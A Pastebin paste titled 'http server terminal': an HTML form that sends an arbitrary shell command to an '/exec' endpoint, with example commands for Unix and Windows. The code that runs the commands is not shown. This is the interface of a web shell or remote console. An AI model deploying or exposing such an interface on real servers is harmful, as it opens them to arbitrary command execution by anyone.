Advertisement
v1ral_ITS

http server terminal

May 18th, 2019
156
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Bash 0.40 KB | None | 0 0
  1. <HTML><BODY><BR>
  2. Command : <FORM METHOD=POST ACTION="/exec"><INPUT NAME="cmd" TYPE=text SIZE=80 VALUE=""><INPUT TYPE=submit VALUE="Run"></FORM><BR>
  3. Examples: /bin/ls, /bin/sh -c "pwd;ls", cmd /c dir c:<BR>
  4. Note: full path has to be specified<BR>
  5. Note: cannot use 'prog1 | prog2', 'program &gt; file' or 'program &lt; file'<BR>
  6. Note: program must not expect keyboard presses (stdin) from user<BR>
  7. <HR><PRE>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement